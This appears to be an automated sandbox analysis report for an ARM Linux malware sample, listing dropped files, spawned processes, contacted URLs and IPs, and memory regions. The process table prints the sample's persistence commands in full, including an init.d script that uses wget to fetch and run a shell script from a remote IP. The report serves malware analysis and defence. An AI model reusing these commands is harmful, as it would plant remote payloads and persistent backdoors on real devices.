Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
arm7.nn-20241014-0317.elf
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
|
initial sample
|
||
/etc/init.d/arm7.nn-20241014-0317.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/init.d/mybinary
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/profile
|
ASCII text
|
dropped
|
||
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/boot/bootcmd
|
ASCII text
|
dropped
|
||
/etc/inittab
|
ASCII text
|
dropped
|
||
/etc/motd
|
ASCII text
|
dropped
|
||
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
/tmp/qemu-open.JRkfZ0 (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/tmp/arm7.nn-20241014-0317.elf
|
/tmp/arm7.nn-20241014-0317.elf
|
||
/tmp/arm7.nn-20241014-0317.elf
|
-
|
||
/tmp/arm7.nn-20241014-0317.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
/tmp/arm7.nn-20241014-0317.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/mybinary
|
||
/tmp/arm7.nn-20241014-0317.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
|
||
/tmp/arm7.nn-20241014-0317.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn-20241014-0317.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting
arm7.nn-20241014-0317.elf'\n /tmp/arm7.nn-20241014-0317.elf &\n wget http://87.120.84.247/ -O /tmp/lol.sh\n chmod
+x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm7.nn-20241014-0317.elf'\n killall arm7.nn-20241014-0317.elf\n
;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n
;;\nesac\nexit 0\" > /etc/init.d/arm7.nn-20241014-0317.elf"
|
||
/tmp/arm7.nn-20241014-0317.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/arm7.nn-20241014-0317.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/arm7.nn-20241014-0317.elf
|
||
/tmp/arm7.nn-20241014-0317.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
/tmp/arm7.nn-20241014-0317.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/arm7.nn-20241014-0317.elf /etc/rc.d/S99arm7.nn-20241014-0317.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/arm7.nn-20241014-0317.elf /etc/rc.d/S99arm7.nn-20241014-0317.elf
|
||
/tmp/arm7.nn-20241014-0317.elf
|
-
|
||
/tmp/arm7.nn-20241014-0317.elf
|
-
|
||
/tmp/arm7.nn-20241014-0317.elf
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 39 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://87.120.84.247/
|
unknown
|
||
http://87.120.84.247/curl.sh
|
unknown
|
||
http://87.120.84.247/lol.sh
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
44.16.160.26
|
unknown
|
United States
|
||
37.24.249.116
|
unknown
|
Germany
|
||
83.137.173.159
|
unknown
|
Germany
|
||
15.214.12.109
|
unknown
|
United States
|
||
145.251.89.48
|
unknown
|
Sweden
|
||
192.72.93.104
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
57.175.58.206
|
unknown
|
Belgium
|
||
98.217.7.244
|
unknown
|
United States
|
||
183.26.185.3
|
unknown
|
China
|
||
23.147.25.209
|
unknown
|
Reserved
|
||
94.157.232.224
|
unknown
|
Netherlands
|
||
125.70.1.191
|
unknown
|
China
|
||
9.49.145.198
|
unknown
|
United States
|
||
51.195.206.221
|
unknown
|
France
|
||
50.148.190.167
|
unknown
|
United States
|
||
68.79.250.163
|
unknown
|
United States
|
||
82.249.237.104
|
unknown
|
France
|
||
89.122.218.199
|
unknown
|
Romania
|
||
89.156.236.170
|
unknown
|
France
|
||
108.194.245.60
|
unknown
|
United States
|
||
215.83.142.111
|
unknown
|
United States
|
||
141.93.191.42
|
unknown
|
Netherlands
|
||
54.191.182.223
|
unknown
|
United States
|
||
126.251.172.245
|
unknown
|
Japan
|
||
189.215.206.76
|
unknown
|
Mexico
|
||
12.61.200.120
|
unknown
|
United States
|
||
204.50.220.94
|
unknown
|
Canada
|
||
104.124.6.21
|
unknown
|
United States
|
||
184.23.186.178
|
unknown
|
United States
|
||
80.127.194.131
|
unknown
|
Netherlands
|
||
165.201.64.245
|
unknown
|
United States
|
||
95.190.92.216
|
unknown
|
Russian Federation
|
||
18.173.114.73
|
unknown
|
United States
|
||
175.67.211.90
|
unknown
|
China
|
||
11.9.118.150
|
unknown
|
United States
|
||
2.106.88.98
|
unknown
|
Denmark
|
||
100.179.23.4
|
unknown
|
United States
|
||
75.137.117.248
|
unknown
|
United States
|
||
96.76.82.66
|
unknown
|
United States
|
||
116.251.7.56
|
unknown
|
Australia
|
||
167.107.97.4
|
unknown
|
United States
|
||
99.214.118.16
|
unknown
|
Canada
|
||
83.188.137.211
|
unknown
|
Sweden
|
||
12.150.124.23
|
unknown
|
United States
|
||
193.92.36.116
|
unknown
|
Greece
|
||
12.90.135.179
|
unknown
|
United States
|
||
157.120.226.44
|
unknown
|
United Kingdom
|
||
154.190.196.44
|
unknown
|
Egypt
|
||
204.143.5.64
|
unknown
|
United States
|
||
124.112.153.161
|
unknown
|
China
|
||
187.200.136.57
|
unknown
|
Mexico
|
||
39.53.241.39
|
unknown
|
Pakistan
|
||
88.55.241.19
|
unknown
|
Italy
|
||
115.246.144.183
|
unknown
|
India
|
||
35.187.46.153
|
unknown
|
United States
|
||
147.132.137.115
|
unknown
|
Australia
|
||
147.201.81.51
|
unknown
|
United Kingdom
|
||
219.152.25.215
|
unknown
|
China
|
||
216.248.111.18
|
unknown
|
United States
|
||
25.233.176.5
|
unknown
|
United Kingdom
|
||
73.227.30.47
|
unknown
|
United States
|
||
77.44.133.159
|
unknown
|
Syrian Arab Republic
|
||
37.202.88.53
|
unknown
|
Jordan
|
||
37.77.63.126
|
unknown
|
Netherlands
|
||
25.54.199.191
|
unknown
|
United Kingdom
|
||
152.71.160.253
|
unknown
|
United Kingdom
|
||
187.242.155.35
|
unknown
|
Mexico
|
||
157.232.246.25
|
unknown
|
United States
|
||
12.76.213.170
|
unknown
|
United States
|
||
165.38.160.42
|
unknown
|
United States
|
||
88.143.185.147
|
unknown
|
France
|
||
156.238.189.164
|
unknown
|
Seychelles
|
||
29.39.190.159
|
unknown
|
United States
|
||
221.48.15.173
|
unknown
|
Japan
|
||
14.116.136.85
|
unknown
|
China
|
||
180.233.40.87
|
unknown
|
China
|
||
11.89.107.185
|
unknown
|
United States
|
||
193.143.1.59
|
unknown
|
unknown
|
||
148.227.253.98
|
unknown
|
Mexico
|
||
128.253.97.199
|
unknown
|
United States
|
||
221.142.223.41
|
unknown
|
Korea Republic of
|
||
93.88.38.33
|
unknown
|
Italy
|
||
43.218.112.185
|
unknown
|
Japan
|
||
25.123.126.211
|
unknown
|
United Kingdom
|
||
166.108.61.59
|
unknown
|
United States
|
||
179.15.192.40
|
unknown
|
Colombia
|
||
130.230.171.14
|
unknown
|
Finland
|
||
129.32.204.60
|
unknown
|
United States
|
||
53.19.188.179
|
unknown
|
Germany
|
||
24.163.133.54
|
unknown
|
United States
|
||
94.137.110.102
|
unknown
|
Sweden
|
||
36.15.107.199
|
unknown
|
Japan
|
||
86.4.154.219
|
unknown
|
United Kingdom
|
||
108.122.57.78
|
unknown
|
United States
|
||
31.181.83.136
|
unknown
|
Russian Federation
|
||
82.212.165.0
|
unknown
|
Belgium
|
||
206.211.34.61
|
unknown
|
United States
|
||
34.242.128.2
|
unknown
|
United States
|
||
198.215.56.33
|
unknown
|
United States
|
||
67.246.121.72
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7fddd8036000
|
page execute read
|
|||
7fddd8036000
|
page execute read
|
|||
5560042cf000
|
page read and write
|
|||
7fdee014c000
|
page read and write
|
|||
7fdee0191000
|
page read and write
|
|||
5560042d8000
|
page read and write
|
|||
5560062ed000
|
page read and write
|
|||
5560042cf000
|
page read and write
|
|||
7fdedfe1e000
|
page read and write
|
|||
7fdedf842000
|
page read and write
|
|||
7fff08aac000
|
page execute read
|
|||
7fdedec46000
|
page read and write
|
|||
7fff08aac000
|
page execute read
|
|||
7fddd8049000
|
page read and write
|
|||
7fdedffff000
|
page read and write
|
|||
7fff08a42000
|
page read and write
|
|||
7fdedfe1e000
|
page read and write
|
|||
7fded8021000
|
page read and write
|
|||
7fdedf44e000
|
page read and write
|
|||
7fddd803e000
|
page read and write
|
|||
7fdee014c000
|
page read and write
|
|||
7fdedfad0000
|
page read and write
|
|||
556006a82000
|
page read and write
|
|||
7fdedf4e0000
|
page read and write
|
|||
7fdee0191000
|
page read and write
|
|||
7fdedfc3c000
|
page read and write
|
|||
7fdedfaad000
|
page read and write
|
|||
7fdedf4e0000
|
page read and write
|
|||
7fdedec46000
|
page read and write
|
|||
7fddd8043000
|
page read and write
|
|||
7fddd803e000
|
page read and write
|
|||
7fded7fff000
|
page read and write
|
|||
556006a82000
|
page read and write
|
|||
55600407e000
|
page execute read
|
|||
7fdedfad0000
|
page read and write
|
|||
7fded8021000
|
page read and write
|
|||
7fdee0128000
|
page read and write
|
|||
7fdedf44e000
|
page read and write
|
|||
7fff08a42000
|
page read and write
|
|||
5560062ed000
|
page read and write
|
|||
7fdedffff000
|
page read and write
|
|||
7fded7fff000
|
page read and write
|
|||
7fdee0128000
|
page read and write
|
|||
5560062d6000
|
page execute and read and write
|
|||
7fdedf842000
|
page read and write
|
|||
7fddd8043000
|
page read and write
|
|||
5560042d8000
|
page read and write
|
|||
7fdedfc3c000
|
page read and write
|
|||
55600407e000
|
page execute read
|
|||
7fdedfaad000
|
page read and write
|
|||
5560062d6000
|
page execute and read and write
|
There are 41 hidden memdumps, click here to show them.